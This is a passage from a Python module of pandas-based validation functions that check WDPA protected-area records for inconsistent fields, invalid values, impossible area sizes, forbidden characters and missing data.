'OWN_TYPE'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n######################################\n#### 3.12. Inconsistent MANG_AUTH ####\n######################################\n\ndef inconsistent_mang_auth_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'MANG_AUTH'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'MANG_AUTH'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n######################################\n#### 3.13. Inconsistent MANG_PLAN ####\n######################################\n\ndef inconsistent_mang_plan_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'MANG_PLAN'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'MANG_PLAN'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n##################################\n#### 3.14. Inconsistent VERIF ####\n##################################\n\ndef inconsistent_verif_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'VERIF'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'VERIF'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#######################################\n#### 3.15. Inconsistent METADATAID ####\n#######################################\n\ndef inconsistent_metadataid_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'METADATAID'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'METADATAID'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n####################################\n#### 3.16. Inconsistent SUB_LOC ####\n####################################\n\ndef inconsistent_sub_loc_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'SUB_LOC'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'SUB_LOC'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#######################################\n### 3.17. Inconsistent PARENT_ISO3 ####\n#######################################\n\ndef inconsistent_parent_iso3_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'PARENT_ISO3'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'PARENT_ISO3'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#################################\n#### 3.18. Inconsistent ISO3 ####\n#################################\n\n\ndef inconsistent_iso3_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'ISO3'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'ISO3'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\t\n##########################################\n#### 4. Find invalid values in fields ####\n##########################################\n\n#### Factory Function ####\n\ndef invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'invalid' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. This function is the foundation of the others.\n \n This function checks the WDPA for invalid values and returns a list of WDPA_PIDs \n that have invalid values for the specified field(s).\n \n Return True if invalid values are found in specified fields.\n \n Return list of WDPA_PIDs with invalid fields, if return_pid is set True.\n\n ## Arguments ##\n \n field -- a string specifying the field to be checked\n field_allowed_values -- a list of expected values in each field\n condition_field -- a list with another field on which the evaluation of \n invalid values depends; leave \"\" if no condition specified\n condition_crit -- a list of values for which the condition_field \n needs to be evaluated; leave [] if no condition specified\n\n ## Example ##\n invalid_value_in_field(\n wdpa_df,\n field=\"DESIG_ENG\",\n field_allowed_values=[\"Ramsar Site, Wetland of International Importance\", \n \"UNESCO-MAB Biosphere Reserve\", \n \"World Heritage Site (natural or mixed)\"],\n condition_field=\"DESIG_TYPE\",\n condition_crit=[\"International\"],\n return_pid=True):\n '''\n\n # if condition_field and condition_crit are specified\n if condition_field != '' and condition_crit != []:\n invalid_wdpa_pid = wdpa_df[(~wdpa_df[field].isin(field_allowed_values)) & (wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n\n # If condition_field and condition_crit are not specified\n else:\n invalid_wdpa_pid = wdpa_df[~wdpa_df[field].isin(field_allowed_values)]['WDPA_PID'].values\n \n if return_pid:\n # return list with invalid WDPA_PIDs\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n#############################\n#### 4.1. Invalid PA_DEF ####\n#############################\n\ndef invalid_pa_def(wdpa_df, return_pid=False):\n '''\n Return True if PA_DEF not 1\n Return list of WDPA_PIDs where PA_DEF is not 1, if return_pid is set True\n '''\n\n field = 'PA_DEF'\n field_allowed_values = ['1'] # WDPA datatype is string\n condition_field = ''\n condition_crit = []\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################################\n#### 4.2. Invalid DESIG_ENG - international ####\n################################################\n\ndef invalid_desig_eng_international(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_ENG is invalid while DESIG_TYPE is 'International'\n Return list of WDPA_PIDs where DESIG_ENG is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_ENG'\n field_allowed_values = ['Ramsar Site, Wetland of International Importance', \n 'UNESCO-MAB Biosphere Reserve', \n 'World Heritage Site (natural or mixed)']\n condition_field = 'DESIG_TYPE'\n condition_crit = ['International']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#################################################\n#### 4.3. Invalid DESIG_TYPE - international ####\n#################################################\n\ndef invalid_desig_type_international(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_TYPE is unequal to 'International', while DESIG_ENG is an allowed 'International' value\n Return list of WDPA_PIDs where DESIG_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_TYPE'\n field_allowed_values = ['International']\n condition_field = 'DESIG_ENG'\n condition_crit = ['Ramsar Site, Wetland of International Importance', \n 'UNESCO-MAB Biosphere Reserve', \n 'World Heritage Site (natural or mixed)']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n\n###########################################\n#### 4.4. Invalid DESIG_ENG - regional ####\n###########################################\n\ndef invalid_desig_eng_regional(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_ENG is invalid while DESIG_TYPE is 'Regional'\n Return list of WDPA_PIDs where DESIG_ENG is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_ENG'\n field_allowed_values = ['Baltic Sea Protected Area (HELCOM)', \n 'Specially Protected Area (Cartagena Convention)', \n 'Marine Protected Area (CCAMLR)', \n 'Marine Protected Area (OSPAR)', \n 'Site of Community Importance (Habitats Directive)', \n 'Special Protection Area (Birds Directive)', \n 'Specially Protected Areas of Mediterranean Importance (Barcelona Convention)']\n condition_field = 'DESIG_TYPE'\n condition_crit = ['Regional']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###########################################\n#### 4.5. Invalid DESIG_TYPE - regional ###\n###########################################\n\ndef invalid_desig_type_regional(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_TYPE is unequal to 'Regional' while DESIG_ENG is an allowed 'Regional' value\n Return list of WDPA_PIDs where DESIG_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_TYPE'\n field_allowed_values = ['Regional']\n condition_field = 'DESIG_ENG'\n condition_crit = ['Baltic Sea Protected Area (HELCOM)', \n 'Specially Protected Area (Cartagena Convention)', \n 'Marine Protected Area (CCAMLR)', \n 'Marine Protected Area (OSPAR)', \n 'Site of Community Importance (Habitats Directive)', \n 'Special Protection Area (Birds Directive)', \n 'Specially Protected Areas of Mediterranean Importance (Barcelona Convention)']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n\n#################################################################################\n#### 4.6. Invalid INT_CRIT & DESIG_ENG - Ramsar Site & World Heritage Sites ####\n#################################################################################\n\ndef invalid_int_crit_desig_eng_ramsar_whs(wdpa_df, return_pid=False):\n '''\n Return True if INT_CRIT is unequal to the allowed values (>1000 possible values) \n and DESIG_ENG equals 'Ramsar Site (...)' or 'World Heritage Site (...)'\n Return list of WDPA_PIDs where INT_CRIT is invalid, if return_pid is set True\n '''\n \n # Function to create the possible INT_CRIT combination\n def generate_combinations():\n import itertools\n collection = []\n INT_CRIT_ELEMENTS = ['(i)','(ii)','(iii)','(iv)',\n '(v)','(vi)','(vii)','(viii)',\n '(ix)','(x)']\n for length_combi in range(1, len(INT_CRIT_ELEMENTS)+1): # for 1 - 10 elements\n for combi in itertools.combinations(INT_CRIT_ELEMENTS, length_combi): # generate combinations\n collection.append(''.join(combi)) # append to list, remove the '' in each combination\n return collection\n \n # Arguments\n field = 'INT_CRIT'\n field_allowed_values_extra = ['Not Reported']\n field_allowed_values = generate_combinations() + field_allowed_values_extra\n condition_field = 'DESIG_ENG'\n condition_crit = ['Ramsar Site, Wetland of International Importance', \n 'World Heritage Site (natural or mixed)']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#################################\n#### 4.7. Invalid DESIG_TYPE ####\n#################################\n\ndef invalid_desig_type(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_TYPE is not \"National\", \"Regional\", \"International\" or \"Not Applicable\"\n Return list of WDPA_PIDs where DESIG_TYPE is invalid, if return_pid is set True\n '''\n\n field = 'DESIG_TYPE'\n field_allowed_values = ['National', \n 'Regional', \n 'International', \n 'Not Applicable']\n condition_field = ''\n condition_crit = []\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###############################\n#### 4.8. Invalid IUCN_CAT ####\n###############################\n\ndef invalid_iucn_cat(wdpa_df, return_pid=False):\n '''\n Return True if IUCN_CAT is not equal to allowed values\n Return list of WDPA_PIDs where IUCN_CAT is invalid, if return_pid is set True\n '''\n \n field = 'IUCN_CAT'\n field_allowed_values = ['Ia', 'Ib', 'II', 'III', \n 'IV', 'V', 'VI', \n 'Not Reported', \n 'Not Applicable', \n 'Not Assigned']\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#####################################################################\n#### 4.9. Invalid IUCN_CAT - UNESCO-MAB and World Heritage Sites ####\n#####################################################################\n\ndef invalid_iucn_cat_unesco_whs(wdpa_df, return_pid=False):\n '''\n Return True if IUCN_CAT is unqueal to 'Not Applicable' \n and DESIG_ENG is 'UNESCO-MAB (...)' or 'World Heritage Site (...)'\n Return list of WDPA_PIDs where IUCN_CAT is invalid, if return_pid is set True\n '''\n \n field = 'IUCN_CAT'\n field_allowed_values = ['Not Applicable']\n condition_field = 'DESIG_ENG'\n condition_crit = ['UNESCO-MAB Biosphere Reserve', \n 'World Heritage Site (natural or mixed)']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n##############################\n#### 4.10. Invalid MARINE ####\n##############################\n\ndef invalid_marine(wdpa_df, return_pid=False):\n '''\n Return True if MARINE is not in [0,1,2]\n Return list of WDPA_PIDs where MARINE is invalid, if return_pid is set True\n '''\n\n field = 'MARINE'\n field_allowed_values = ['0','1','2']\n condition_field = ''\n condition_crit = []\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n############################################\n#### 4.11. Invalid NO_TAKE & MARINE = 0 ####\n############################################\n\ndef invalid_no_take_marine0(wdpa_df, return_pid=False):\n '''\n Return True if NO_TAKE is not equal to 'Not Applicable' and MARINE = 0\n Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid is set True\n '''\n\n field = 'NO_TAKE'\n field_allowed_values = ['Not Applicable']\n condition_field = 'MARINE'\n condition_crit = ['0']\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################################\n#### 4.12. Invalid NO_TAKE & MARINE = [1,2] ####\n################################################\n\ndef invalid_no_take_marine12(wdpa_df, return_pid=False):\n '''\n Return True if NO_TAKE is not in ['All', 'Part', 'None', 'Not Reported'] while MARINE = [1, 2]\n I.e. check whether coastal and marine sites (MARINE = [1, 2]) have an invalid NO_TAKE value.\n Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid is set True\n '''\n\n field = 'NO_TAKE'\n field_allowed_values = ['All', 'Part', 'None', 'Not Reported']\n condition_field = 'MARINE'\n condition_crit = ['1', '2']\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###########################################\n#### 4.13. Invalid NO_TK_AREA & MARINE ####\n###########################################\n\ndef invalid_no_tk_area_marine0(wdpa_df, return_pid=False):\n '''\n Return True if NO_TK_AREA is unequal to 0 while MARINE = 0\n Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid is set True\n '''\n\n field = 'NO_TK_AREA'\n field_allowed_values = [0]\n condition_field = 'MARINE'\n condition_crit = ['0']\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n############################################\n#### 4.14. Invalid NO_TK_AREA & NO_TAKE ####\n############################################\n\ndef invalid_no_tk_area_no_take(wdpa_df, return_pid=False):\n '''\n Return True if NO_TK_AREA is unequal to 0 while NO_TAKE = 'Not Applicable'\n Return list of WDPA_PIDs where NO_TK_AREA is invalid, if return_pid is set True\n '''\n\n field = 'NO_TK_AREA'\n field_allowed_values = [0]\n condition_field = 'NO_TAKE'\n condition_crit = ['Not Applicable']\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n##############################\n#### 4.15. Invalid STATUS ####\n##############################\n\ndef invalid_status(wdpa_df, return_pid=False):\n '''\n Return True if STATUS is unequal to any of the following allowed values:\n [\"Proposed\", \"Inscribed\", \"Adopted\", \"Designated\", \"Established\"]\n Return list of WDPA_PIDs where STATUS is invalid, if return_pid is set True\n '''\n\n field = 'STATUS'\n field_allowed_values = ['Proposed', 'Inscribed', 'Adopted', 'Designated', 'Established']\n condition_field = ''\n condition_crit = []\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#################################\n#### 4.16. Invalid STATUS_YR ####\n#################################\n\ndef invalid_status_yr(wdpa_df, return_pid=False):\n '''\n Return True if STATUS_YR is unequal to 0 or any year between 1750 and the current year\n Return list of WDPA_PIDs where STATUS_YR is invalid, if return_pid is set True\n '''\n \n field = 'STATUS_YR'\n year = datetime.date.today().year # obtain current year\n yearArray = [0] + np.arange(1750, year + 1, 1).tolist() # make a list of all years, from 0 to current year\n field_allowed_values = [str(x) for x in yearArray] # change all integers to strings\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################\n#### 4.17. Invalid GOV_TYPE ####\n################################\n\ndef invalid_gov_type(wdpa_df, return_pid=False):\n '''\n Return True if GOV_TYPE is invalid\n Return list of WDPA_PIDs where GOV_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'GOV_TYPE'\n field_allowed_values = ['Federal or national ministry or agency', \n 'Sub-national ministry or agency', \n 'Government-delegated management', \n 'Transboundary governance', \n 'Collaborative governance', \n 'Joint governance', \n 'Individual landowners', \n 'Non-profit organisations', \n 'For-profit organisations', \n 'Indigenous peoples', \n 'Local communities', \n 'Not Reported']\n \n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################\n#### 4.18. Invalid OWN_TYPE ####\n################################\n\ndef invalid_own_type(wdpa_df, return_pid=False):\n '''\n Return True if OWN_TYPE is invalid\n Return list of WDPA_PIDs where OWN_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'OWN_TYPE'\n field_allowed_values = ['State', \n 'Communal', \n 'Individual landowners', \n 'For-profit organisations', \n 'Non-profit organisations', \n 'Joint ownership', \n 'Multiple ownership', \n 'Contested', \n 'Not Reported']\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#############################\n#### 4.19. Invalid VERIF ####\n#############################\n\ndef invalid_verif(wdpa_df, return_pid=False):\n '''\n Return True if VERIF is invalid\n Return list of WDPA_PIDs where VERIF is invalid, if return_pid is set True\n '''\n \n field = 'VERIF'\n field_allowed_values = ['State Verified', \n 'Expert Verified', \n 'Not Reported']\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\t\n###################################\n#### 4.20. Invalid PARENT_ISO3 ####\n###################################\ndef invalid_country_codes(wdpa_df, field, return_pid=False):\n\n def _correct_iso3(field):\n for each in field.split(';'):\n if each in iso3:\n pass\n else:\n return False\n\n return True\n\n invalid_wdpa_pid = wdpa_df[~wdpa_df[field].apply(_correct_iso3)]['WDPA_PID'].values\n\n if return_pid:\n return invalid_wdpa_pid\n\n else:\n return len(invalid_wdpa_pid) > 0\n\ndef invalid_parent_iso3(wdpa_df, return_pid=False):\n\n return invalid_country_codes(wdpa_df, 'PARENT_ISO3', return_pid)\n\n############################\n#### 4.21. Invalid ISO3 ####\n############################\n\ndef invalid_iso3(wdpa_df, return_pid=False):\n\n return invalid_country_codes(wdpa_df, 'ISO3', return_pid)\n\n###########################################\n#### 4.22. Invalid STATUS & DESIG_TYPE ####\n###########################################\n\ndef invalid_status_desig_type(wdpa_df, return_pid=False):\n '''\n Return True if STATUS is unequal to 'Established', while DESIG_TYPE = 'Not Applicable'\n Return list of WDPA_PIDs for which the STATUS is invalid\n '''\n\n field = 'STATUS'\n field_allowed_values = ['Established']\n condition_field = 'DESIG_TYPE'\n condition_crit = ['Not Applicable']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###############################################################\n#### 5. Area invalid size: GIS or Reported area is invalid ####\n###############################################################\n\n#### Factory Function ####\n\ndef area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'area' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. This function is the foundation of the others.\n \n This function checks the WDPA for invalid areas and returns a list of WDPA_PIDs \n that have invalid values for the specified field(s).\n\n Return True if the size of the small_area is invalid compared to large_area\n\n Return list of WDPA_PIDs where small_area is invalid compared to large_area,\n if return_pid is set True\n\n ## Arguments ##\n field_small_area -- string of the field to check for size - supposedly smaller\n field_large_area -- string of the field to check for size - supposedly larger\n \n ## Example ##\n area_invalid_size(\n wdpa_df,\n field_small_area=\"GIS_M_AREA\",\n field_large_area=\"GIS_AREA\",\n return_pid=True):\n '''\n \n size_threshold = 1.0001 # due to the rounding of numbers, there are many false positives without a threshold.\n\n if field_small_area and field_large_area:\n invalid_wdpa_pid = wdpa_df[wdpa_df[field_small_area] > \n (size_threshold*wdpa_df[field_large_area])]['WDPA_PID'].values\n\n else:\n raise Exception('ERROR: field(s) to test is (are) not specified')\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n######################################################\n#### 5.1. Area invalid: NO_TK_AREA and REP_M_AREA ####\n######################################################\n\ndef area_invalid_no_tk_area_rep_m_area(wdpa_df, return_pid=False):\n '''\n Return True if NO_TK_AREA is larger than REP_M_AREA\n Return list of WDPA_PIDs where NO_TK_AREA is larger than REP_M_AREA if return_pid=True\n '''\n \n field_small_area = 'NO_TK_AREA'\n field_large_area = 'REP_M_AREA'\n \n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\n######################################################\n#### 5.2. Area invalid: NO_TK_AREA and GIS_M_AREA ####\n######################################################\n\ndef area_invalid_no_tk_area_gis_m_area(wdpa_df, return_pid=False):\n '''\n Return True if NO_TK_AREA is larger than GIS_M_AREA\n Return list of WDPA_PIDs where NO_TK_AREA is larger than GIS_M_AREA if return_pid=True\n '''\n \n field_small_area = 'NO_TK_AREA'\n field_large_area = 'GIS_M_AREA'\n \n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\n####################################################\n#### 5.3. Area invalid: GIS_M_AREA and GIS_AREA ####\n####################################################\n\ndef area_invalid_gis_m_area_gis_area(wdpa_df, return_pid=False):\n '''\n Return True if GIS_M_AREA is larger than GIS_AREA\n Return list of WDPA_PIDs where GIS_M_AREA is larger than GIS_AREA, if return_pid=True\n '''\n \n field_small_area = 'GIS_M_AREA'\n field_large_area = 'GIS_AREA'\n\n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\n####################################################\n#### 5.4. Area invalid: REP_M_AREA and REP_AREA ####\n####################################################\n\ndef area_invalid_rep_m_area_rep_area(wdpa_df, return_pid=False):\n '''\n Return True if REP_M_AREA is larger than REP_AREA\n Return list of WDPA_PIDs where REP_M_AREA is larger than REP_AREA, if return_pid=True\n '''\n \n field_small_area = 'REP_M_AREA'\n field_large_area = 'REP_AREA'\n \n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\t\n#################################\n#### 6. Forbidden characters ####\n#################################\n\n#### Factory Function ####\n\ndef forbidden_character(wdpa_df, check_field, return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'forbidden character' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. This function is the foundation of the others.\n \n This function checks the WDPA for forbidden characters and returns a list of WDPA_PIDs \n that have invalid values for the specified field(s).\n\n Return True if forbidden characters (specified below) are found in the DataFrame\n\n Return list of WDPA_PID where forbidden characters occur, if \n return_pid is set True\n\n ## Arguments ##\n check_field -- string of the field to check for forbidden characters\n \n ## Example ##\n forbidden_character(\n wdpa_df,\n check_field=\"DESIG_ENG\",\n return_pid=True): \n '''\n\n # Import regular expression package and the forbidden characters\n forbidden_characters = ['<','>','?','*','\\r','\\n']\n forbidden_characters_esc = [re.escape(s) for s in forbidden_characters]\n\n pattern = '|'.join(forbidden_characters_esc)\n\n # Obtain the WDPA_PIDs with forbidden characters\n # remove those with nas\n wdpa_df = wdpa_df.dropna()\n invalid_wdpa_pid = wdpa_df[wdpa_df[check_field].str.contains(pattern, case=False)]['WDPA_PID'].values\n\n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n#########################################\n#### 6.1. Forbidden character - NAME ####\n#########################################\n\ndef forbidden_character_name(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'NAME'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'NAME'\n '''\n\n check_field = 'NAME'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.2. Forbidden character - ORIG_NAME ####\n##############################################\n\ndef forbidden_character_orig_name(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'ORIG_NAME'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'ORIG_NAME'\n '''\n\n check_field = 'ORIG_NAME'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n##########################################\n#### 6.3. Forbidden character - DESIG ####\n##########################################\n\ndef forbidden_character_desig(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'DESIG'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'DESIG'\n '''\n\n check_field = 'DESIG'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.4. Forbidden character - DESIG_ENG ####\n##############################################\n\ndef forbidden_character_desig_eng(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'DESIG_ENG'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'DESIG_ENG'\n '''\n\n check_field = 'DESIG_ENG'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.5. Forbidden character - MANG_AUTH ####\n##############################################\n\ndef forbidden_character_mang_auth(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'MANG_AUTH'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'MANG_AUTH'\n '''\n\n check_field = 'MANG_AUTH'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.6. Forbidden character - MANG_PLAN ####\n##############################################\n\ndef forbidden_character_mang_plan(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'MANG_PLAN'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'MANG_PLAN'\n '''\n\n check_field = 'MANG_PLAN'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n############################################\n#### 6.7. Forbidden character - SUB_LOC ####\n############################################\n\ndef forbidden_character_sub_loc(wdpa_df, return_pid=False):\n '''\n Capture forbidden characters in the field 'SUB_LOC'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing forbidden characters in field 'SUB_LOC'\n '''\n\n check_field = 'SUB_LOC'\n\n return forbidden_character(wdpa_df, check_field, return_pid)\n\n########################\n#### 7. NaN present ####\n########################\n\n#### Factory Function ####\n\ndef nan_present(wdpa_df, check_field, return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'nan_present' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. This function is the foundation of the others.\n \n This function checks the WDPA for NaN / NA / None values and returns \n a list of WDPA_PIDs that have invalid values for the specified field(s).\n\n Return True if NaN / NA values are found in the DataFrame\n\n Return list of WDPA_PID where forbidden characters occur, if \n return_pid is set True\n\n ## Arguments ##\n check_field -- string of field to be checked for NaN / NA values\n \n ## Example ##\n na_present(\n wdpa_df,\n check_field=\"DESIG_ENG\",\n return_pid=True): \n '''\n\n invalid_wdpa_pid = wdpa_df[pd.isna(wdpa_df[check_field])]['WDPA_PID'].values\n\n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n#################################\n#### 7.1. NaN present - NAME ####\n#################################\n\ndef nan_present_name(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'NAME'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'NAME'\n '''\n\n check_field = 'NAME'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.2. NaN present - ORIG_NAME ####\n######################################\n\ndef nan_present_orig_name(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'ORIG_NAME'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'ORIG_NAME'\n '''\n\n check_field = 'ORIG_NAME'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n##################################\n#### 7.3. NaN present - DESIG ####\n##################################\n\ndef nan_present_desig(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'DESIG'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'DESIG'\n '''\n\n check_field = 'DESIG'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.4. NaN present - DESIG_ENG ####\n######################################\n\ndef nan_present_desig_eng(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'DESIG_ENG'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'DESIG_ENG'\n '''\n\n check_field = 'DESIG_ENG'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.5. NaN present - MANG_AUTH ####\n######################################\n\ndef nan_present_mang_auth(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'MANG_AUTH'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'MANG_AUTH'\n '''\n\n check_field = 'MANG_AUTH'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.6. NaN present - MANG_PLAN ####\n######################################\n\ndef nan_present_mang_plan(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'MANG_PLAN'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'MANG_PLAN'\n '''\n\n check_field = 'MANG_PLAN'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n####################################\n#### 7.7. NaN present - SUB_LOC ####\n####################################\n\ndef nan_present_sub_loc(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'SUB_LOC'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'SUB_LOC'\n '''\n\n check_field = 'SUB_LOC'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n\n\n#################################################################\n#### 8. METADATAID: WDPA and Source Table (on the Wish List) ####\n#################################################################\n\n#######################################################################\n#### 8.1. Invalid: METADATAID present in WDPA, not in Source Table ####\n#######################################################################\n\n# def invalid_metadataid_not_in_source_table(wdpa_df, wdpa_source, return_pid=False):\n# '''\n# Return True if METADATAID is present in the WDPA but not in the Source Table\n# Return list of WDPA_PIDs for which the METADATAID is not present in the Source 